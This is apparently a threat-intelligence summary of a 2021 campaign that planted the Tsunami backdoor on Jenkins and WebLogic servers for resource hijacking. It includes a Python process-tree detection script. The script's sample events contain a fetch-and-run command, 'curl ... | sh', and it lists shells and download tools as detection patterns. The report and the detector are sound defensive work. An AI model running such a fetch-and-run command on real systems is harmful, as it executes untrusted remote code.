# Full Report
On 2021-10-26, a campaign was reported involving an unknown actor who gained initial access through a software misconfiguration and a 1-day vulnerability, targeting Jenkins and WebLogic servers to achieve resource hijacking. The following tool was observed: Tsunami.
# Analysis Summary
# Tool/Technique: Tsunami
## Overview
Tsunami is a backdoor malware observed being used in a campaign targeting Jenkins and WebLogic servers, ultimately leading to resource hijacking.
## Technical Details
- Type: Malware family
- Platform: Likely Linux/Unix-based systems hosting Jenkins and WebLogic (as these are the targeted applications).
- Capabilities: Backdoor functionality, likely geared towards establishing persistence and facilitating resource hijacking (e.g., cryptomining or botnet enrollment).
- First Seen: Used in a campaign reported on 2021-10-26.
## MITRE ATT&CK Mapping
Due to the limited information on Tsunami's full execution chain, the mappings focus on the observed impact and access vector:
- **TA0001 - Initial Access**
  - T1190 - Exploit Public-Facing Application (inferred if the "1-day vulnerability" was exploited)
- **TA0011 - Command and Control** (implied by Tsunami being a backdoor)
  - T1071 - Application Layer Protocol (likely used for C2)
- **TA0010 - Impact**
  - T1496 - Resource Hijacking (observed impact)
## Functionality
### Core Capabilities
- Establishing persistence on compromised web application servers (Jenkins, WebLogic).
- Exploiting observed vulnerabilities or misconfigurations for initial compromise.
- Executing commands to facilitate resource hijacking.
### Advanced Features
The specific advanced features of the Tsunami variant used in this context are not detailed, but its goal was resource hijacking, suggesting capabilities related to crypto-mining software installation or establishing a botnet agent.
## Indicators of Compromise
- File Hashes: N/A (Not provided in the context)
- File Names: N/A (Not provided in the context)
- Registry Keys: N/A (Not applicable or provided)
- Network Indicators: N/A (Not provided in the context)
- Behavioral Indicators: Observation of processes attempting to consume excessive resources (CPU/GPU) consistent with crypto-mining, or unexplained outbound network traffic initiated by the Jenkins/WebLogic user context.
## Associated Threat Actors
- Unknown actor (Reported on 2021-10-26)
## Detection Methods
- Signature-based detection: Signature matching on known Tsunami binaries (if hashes become available).
- Behavioral detection: Monitoring Java processes (like those running Jenkins/WebLogic) for spawning unexpected shell processes or downloading secondary payloads.
- YARA rules: N/A (Not provided in the context)
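The behavioral detection above (a Java application server process spawning a shell or a download tool) can be expressed as a small process-tree rule. The following is an added example written for this summary, not code from the report or from any vendor product: it reads constructed process-start records in a JSON-lines shape (field names `pid`, `ppid`, `user`, `exe`, `cmdline` are assumptions), walks each suspicious process's parent chain, and flags it when a `java` process sits among its ancestors. The sample records, including the documentation-range address 198.51.100.7, are constructed for the example.

```python
import json
import os
from typing import Dict, List, Optional

# Constructed sample telemetry (not from the report): one JSON record per
# process-start event, in the shape many EDR and auditd exporters produce.
# Field names are assumptions made for this example.
SAMPLE_EVENTS = """
{"pid": 1200, "ppid": 1, "user": "jenkins", "exe": "/usr/bin/java", "cmdline": "java -jar /usr/share/jenkins/jenkins.war"}
{"pid": 1310, "ppid": 1200, "user": "jenkins", "exe": "/bin/sh", "cmdline": "sh -c curl -s http://198.51.100.7/x.sh | sh"}
{"pid": 1311, "ppid": 1310, "user": "jenkins", "exe": "/usr/bin/curl", "cmdline": "curl -s http://198.51.100.7/x.sh"}
{"pid": 1500, "ppid": 1, "user": "oracle", "exe": "/opt/jdk/bin/java", "cmdline": "java weblogic.Server"}
{"pid": 1601, "ppid": 1500, "user": "oracle", "exe": "/usr/bin/java", "cmdline": "java -cp tools.jar Helper"}
{"pid": 2000, "ppid": 1, "user": "root", "exe": "/bin/bash", "cmdline": "bash /etc/cron.daily/backup"}
"""

SHELLS = {"sh", "bash", "dash", "zsh"}          # interactive/command shells
DOWNLOADERS = {"curl", "wget"}                   # typical secondary-payload fetchers
MAX_ANCESTOR_HOPS = 5                            # how far up the tree to look


def parse_events(text: str) -> List[dict]:
    """Parse JSON-lines process-start records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _basename(exe: str) -> str:
    return os.path.basename(exe)


def _java_ancestor(event: dict, by_pid: Dict[int, dict]) -> Optional[dict]:
    """Walk the parent chain and return the nearest java process, or None.

    Walking more than one hop matters: a payload fetch typically looks like
    java -> sh -> curl, so the downloader's direct parent is the shell,
    not the application server.
    """
    cur = event
    for _ in range(MAX_ANCESTOR_HOPS):
        parent = by_pid.get(cur["ppid"])
        if parent is None:            # reached init or a pid not in the capture
            return None
        if _basename(parent["exe"]) == "java":
            return parent
        cur = parent
    return None


def find_suspicious_spawns(events: List[dict]) -> List[dict]:
    """Flag shells and download tools that descend from a java process."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = _basename(e["exe"])
        if name in SHELLS:
            reason = "shell spawned under a Java application server"
        elif name in DOWNLOADERS:
            reason = "download tool spawned under a Java application server"
        else:
            continue
        java = _java_ancestor(e, by_pid)
        if java is None:
            continue
        findings.append({
            "pid": e["pid"],
            "exe": e["exe"],
            "user": e["user"],
            "java_pid": java["pid"],
            "java_cmdline": java["cmdline"],
            "reason": reason,
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_spawns(parse_events(SAMPLE_EVENTS)):
        print(f"pid {f['pid']} ({f['exe']}, user {f['user']}): {f['reason']}; "
              f"ancestor java pid {f['java_pid']}: {f['java_cmdline']}")
```

On the sample, the rule flags the `sh` and `curl` processes under the Jenkins JVM and stays quiet for the `java` child under WebLogic and the root cron shell. In production this rule needs tuning: Jenkins legitimately spawns shells for "Execute shell" build steps, so the finding should be enriched with the ancestor's command line and user and allowlisted per known build agents rather than alerted on blindly.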
## Mitigation Strategies
- **Prevention Measures:** Immediately patch or remediate the "1-day vulnerability" affecting Jenkins/WebLogic infrastructure.
- **Hardening Recommendations:** Review and lock down the software configuration of critical servers such as Jenkins and WebLogic, enforcing the principle of least privilege for application service accounts. Restrict outbound network access from these application servers where possible.
## Related Tools/Techniques
- This activity utilizes techniques common in post-exploitation associated with cryptomining operations. Tsunami itself is a known backdoor, often associated with botnet activities.